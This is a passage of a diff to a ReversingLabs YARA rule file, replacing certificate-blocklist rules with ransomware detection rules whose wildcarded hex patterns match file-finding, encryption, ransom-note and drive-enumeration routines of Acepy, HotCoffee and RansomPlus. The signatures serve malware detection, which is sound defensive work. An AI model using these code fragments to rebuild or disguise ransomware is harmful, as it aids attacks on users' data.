+            ?? ?? ?? 6F ?? ?? ?? ?? 17 31 ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ??
+            ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C
+            2B ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 2D ?? DE ?? 08 2C ?? 08 6F ??
+            ?? ?? ?? DC 28 ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 26 28 ?? ?? ?? ??
+            DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 2A
+        }
+		$encrypt_files_p1 = {
+            02 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 3A ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
+            ?? ?? ?? 31 ?? DD ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 06 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 19
+            73 ?? ?? ?? ?? 0B 02 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ??
+            ?? 17 73 ?? ?? ?? ?? 0D 08 06 6F ?? ?? ?? ?? 16 06 6F ?? ?? ?? ?? 8E 69 6F ?? ?? ?? ??
+            07 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC DE ?? 08 2C ?? 08 6F ?? ?? ??
+            ?? DC DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 02 28 ??
+            ?? ?? ?? DE ?? 26 DE ?? 2A
+        }
+		$encrypt_files_p2 = {
+            73 ?? ?? ?? ?? 0A 06 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 1F ?? 8D ?? ?? ??
+            ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 6F ?? ?? ?? ?? 0B
+            73 ?? ?? ?? ?? 0C 08 06 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 0D 09 07 16 07 8E 69 6F ?? ??
+            ?? ?? 09 6F ?? ?? ?? ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 6F ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 10 ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 13 ?? DE ?? 06 2C ?? 06 6F ?? ?? ??
+            ?? DC 26 DE ?? 02 2A 11 ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infoware Cloud Limited" and pe.signatures [ i ] . serial == "11:26:13:b7:b5:f6:96:cf:37:76:80:f6:46:3f:cc:8c" and 1566518400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $generate_key ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B3F906E5E6B2Cf61C5E51Be79B4E8777 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Acepy : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Acepy ransomware."
 		author = "ReversingLabs"
-		id = "dc826355-bd15-58b3-adcb-55b704f03c0d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "3ffb45b1-6bde-5bf8-957e-433b9488ba91"
+		date = "2022-08-04"
+		modified = "2022-08-04"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4460-L4478"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "037e154854c1128fb73d2221c2b7d7211d977492378614fcf4fde959207e34b3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Acepy.yara#L1-L69"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "92c543a0b8c3c884f83647119d32c7b46f5fe839694bb8a8de0146c5c77bc587"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Acepy"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ??
+            83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ??
+            83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            B8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
+            8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files = {
+            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B8 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 40 50 B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? B8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 39 C8 0F 83 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            8B 45 ?? 89 C1 40 89 45 ?? EB ?? 8B 45 ?? 8B 4D ?? 01 C1 8B 45 ?? 8B 55 ?? 01 C2 8B
+            45 ?? 50 89 4D ?? 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 45 ?? 8B 4D ?? 31 D2
+            F7 F1 8B 45 ?? 01 D0 8B 4D ?? 0F BE 09 0F BE 10 31 D1 8B 45 ?? 88 08 EB ?? B8 ?? ??
+            ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 B9 ?? ?? ?? ?? 51 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 8B 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C9 C3
+        }
+		$drop_ransom_note = {
+            55 89 E5 81 EC ?? ?? ?? ?? 90 B8 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            89 45 ?? 8B 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 50 B8 ?? ?? ?? ?? 50 B8
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ??
+            ?? ?? C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Accelerate Technologies Ltd" and ( pe.signatures [ i ] . serial == "00:b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" or pe.signatures [ i ] . serial == "b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" ) and 1594900020 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $find_files ) and ( $encrypt_files ) and ( $drop_ransom_note ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_566Ac16A57B132D3F64Dced14De790Ee : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Hotcoffee : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects HotCoffee ransomware."
 		author = "ReversingLabs"
-		id = "cb2ebbd5-5036-52f6-a064-11609f02309f"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "11b26b91-96ae-58d3-8a8a-02a3e7d0b82e"
+		date = "2021-11-25"
+		modified = "2021-11-25"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4480-L4496"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "48f4d334614f6c413907d51f4d6312554b13c4f5a3c03070ceba48baa13a8247"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.HotCoffee.yara#L1-L111"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "15ae428c37fcc5a09d324fd9be5a8df3a812e6459cb1ce8eec56eabf785b4c05"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "HotCoffee"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
+            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
+            ?? 4C 2B C9 0F 1F 44 00 ?? 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89
+            01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 89 30
+            48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ?? 48 8D 44 24 ??
+            48 89 44 24 ?? 41 B8 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ??
+            ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 44 24 ?? 48 8B 4C 24 ?? 48 3B
+            C8 74 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 66 39 30 74 ?? 48 83
+            C0 ?? 48 83 E9 ?? 75 ?? 48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 48 0F 44 C6
+            BA ?? ?? ?? ?? 48 2B D0 48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48
+            03 C2 4C 8D 0D ?? ?? ?? ?? 4C 2B C9 48 85 C0 74 ?? 45 0F B7 04 09 66 45 85 C0 74 ??
+            66 44 89 01 48 83 C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1
+            66 89 30 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B E0 48 89
+            44 24 ?? 48 83 F8 ?? 75 ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 8D
+            ?? ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48
+            83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
+        }
+		$encrypt_files_p1 = {
+            B9 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 90 66 83 38 ?? 74 ?? 48 83 C0 ?? 48 83 E9 ?? 75
+            ?? 48 85 C9 74 ?? 41 B8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 4C 2B C1 BA ?? ?? ?? ?? 48
+            85 C9 4C 0F 44 C3 4A 8D 04 40 49 2B D0 74 ?? 49 8D 88 ?? ?? ?? ?? 48 03 CA 4C 8D 0D
+            ?? ?? ?? ?? 4C 2B C8 66 90 48 85 C9 74 ?? 45 0F B7 04 01 66 45 85 C0 74 ?? 66 44 89
+            00 48 FF C9 48 83 C0 ?? 48 83 EA ?? 75 ?? 48 85 D2 48 8D 48 ?? 48 0F 45 C8 66 89 19
+            48 89 5C 24 ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 44 8B C7 8B D7 C7 44 24 ?? ?? ?? ??
+            ?? 49 8B CC FF 15 ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 48 8D
+            8D ?? ?? ?? ?? 44 8B C7 C7 44 24 ?? ?? ?? ?? ?? 48 8B F0 41 8D 51 ?? FF 15 ?? ?? ??
+            ?? 41 B9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ??
+            ?? ?? ?? 4C 8B F0 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 41 B9 ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 33 D2 48 8D 0D ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 45
+        }
+		$encrypt_files_p2 = {
+            33 C0 BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B
+            15 ?? ?? ?? ?? 45 33 C9 48 8B 8D ?? ?? ?? ?? 44 8B C0 FF 15 ?? ?? ?? ?? 4C 8B 85 ??
+            ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 44 8B CF BA ?? ?? ?? ?? 48 89 44
+            24 ?? FF 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 32 DB 41 BD ?? ?? ?? ?? 48
+            8B F8 66 66 66 0F 1F 84 00 ?? ?? 00 00 4C 8D 8D ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ??
+            ?? 41 B8 ?? ?? ?? ?? 48 8B D7 48 8B CE FF 15 ?? ?? ?? ?? 81 BD ?? ?? ?? ?? ?? ?? ??
+            ?? 48 8D 85 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 48 89 44 24 ??
+            0F B6 DB 41 0F 42 DD 48 89 7C 24 ?? 44 0F B6 C3 45 33 C9 33 D2 FF 15 ?? ?? ?? ?? 44
+            8B 85 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D7 48 C7 44 24 ?? ?? ?? ?? ?? 49 8B CE
+            FF 15 ?? ?? ?? ?? 84 DB 0F 84 ?? ?? ?? ?? 4C 8B 6C 24 ?? 48 85 F6 74 ?? 48 8B CE FF
+            15 ?? ?? ?? ?? 4D 85 F6
+        }
+		$drop_ransom_note = {
+            48 85 C9 74 ?? B8 ?? ?? ?? ?? 48 2B C1 48 85 C9 49 0F 44 C6 BA ?? ?? ?? ?? 48 2B D0
+            48 8D 8D ?? ?? ?? ?? 48 8D 0C 41 74 ?? 48 05 ?? ?? ?? ?? 48 03 C2 4C 8D 0D ?? ?? ??
+            ?? 4C 2B C9 66 90 48 85 C0 74 ?? 46 0F B7 04 09 66 45 85 C0 74 ?? 66 44 89 01 48 83
+            C1 ?? 48 FF C8 48 83 EA ?? 75 ?? 48 8D 41 ?? 48 85 D2 48 0F 45 C1 66 44 89 30 4C 89
+            74 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 45 33 C0 BA ?? ??
+            ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 49 C7 C0 ?? ?? ?? ?? 49 FF C0
+            46 38 34 06 75 ?? 4C 89 74 24 ?? 4C 8D 8D ?? ?? ?? ?? 48 8B D6 48 8B CB FF 15 ?? ??
+            ?? ?? 48 85 DB 74 ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CE E8 ?? ?? ?? ?? 90 48 8B 95
+            ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72
+            ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 F6 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 40 88 75 ?? 48
+            8B 95 ?? ?? ?? ?? 48 83 FA ?? 0F 82 ?? ?? ?? ?? 48 8D 14 55 ?? ?? ?? ?? 48 8B 8D ??
+            ?? ?? ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 48 83 C2 ?? 48 8B 49 ?? 48
+            2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 86 ?? ?? ?? ?? FF 15
+        }
+		$enum_drives = {
+            48 89 5D ?? 48 C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 15 ?? ?? ?? ?? 8B F8 0F A3 DF 0F
+            83 ?? ?? ?? ?? 8D 4B ?? 48 C7 45 ?? ?? ?? ?? ?? 88 4D ?? 48 C7 45 ?? ?? ?? ?? ?? 66
+            C7 45 ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 3B 05 ?? ?? ?? ?? 74 ?? 48 8D 55 ?? 48 8B C8
+            E8 ?? ?? ?? ?? 48 83 05 ?? ?? ?? ?? ?? EB ?? 4C 8D 45 ?? 48 8B D0 48 8D 0D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 48 8B 45 ?? 48 83 F8 ?? 72 ?? 48 8D 50 ?? 48 8B 4D ?? 48 8B C1
+            48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ??
+            77 ?? E8 ?? ?? ?? ?? FF C3 83 FB ?? 0F 8C ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            E8 ?? ?? ?? ?? 90 33 C0 48 8B 4D ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 5C 24 ?? 49 8B 5B
+            ?? 49 8B 7B ?? 49 8B E3 5D C3 FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" and 1562889600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_drives ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_D2Caf7908Aaebfa1A8F3E2136Fece024 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ransomplus : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects RansomPlus ransomware."
 		author = "ReversingLabs"
-		id = "6c2c4fc6-5359-55fa-bf79-9202caa5f326"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ee96eab6-104d-560f-adae-6d5f0ba5d469"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4498-L4516"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cf4d17274ef36d61e78578d34634bf6e5fb0fb857a9a92184916b0f3b8484568"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.RansomPlus.yara#L1-L95"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8ab18c6bcb939eac0e74f015dea773141b5086c5fcb4783666eeac1f395bc208"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "RansomPlus"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_1_0 = {
+            55 8B EC 83 E4 ?? 83 EC ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 EC ??
+            8B CC 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 01 ?? E8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ??
+            ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ?? 68 ?? ?? ?? ?? C7 41 ??
+            ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CC 6A ??
+            68 ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? C6 01 ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
+        }
+		$find_files_1_1 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8D 8D ?? ?? ?? ?? 51 50 FF 15 ??
+            ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8B 95 ?? ?? ?? ??
+            41 81 F9 ?? ?? ?? ?? 72 ?? F6 C2 ?? 74 ?? E8 ?? ?? ?? ?? 8B 42 ?? 3B C2 72 ?? E8 ??
+            ?? ?? ?? 2B D0 83 FA ?? 73 ?? E8 ?? ?? ?? ?? 83 FA ?? 76 ?? E8 ?? ?? ?? ?? 8B D0 52
+            E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? 83 FB ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 32 DB E9 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? C6 45 ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85
+        }
+		$find_files_1_2 = {
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            8A 10 3A 11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ??
+            33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB
+            ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 55 ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ??
+            8B CC C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 01 EB ?? 8B C1
+            6A ?? C6 00 ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D
+            ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 51 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 FE ?? 0F 43 C2 0F 43 CA 89 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 03 C1 83 FE ?? 8B F8 0F 43 DA 33 C9 2B FB 33 F6 3B D8 0F 47 F9 85
+            FF 74 ?? 0F BE 04 33 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C4 ?? 88 04 31 46 3B F7
+            75 ?? 33 C0 89 85 ?? ?? ?? ?? 8B 94 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 80 3A ?? 75 ?? 33 C9 EB ?? 8B CA 8D
+            71 ?? 8A 01 41 84 C0 75 ?? 2B CE 51 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
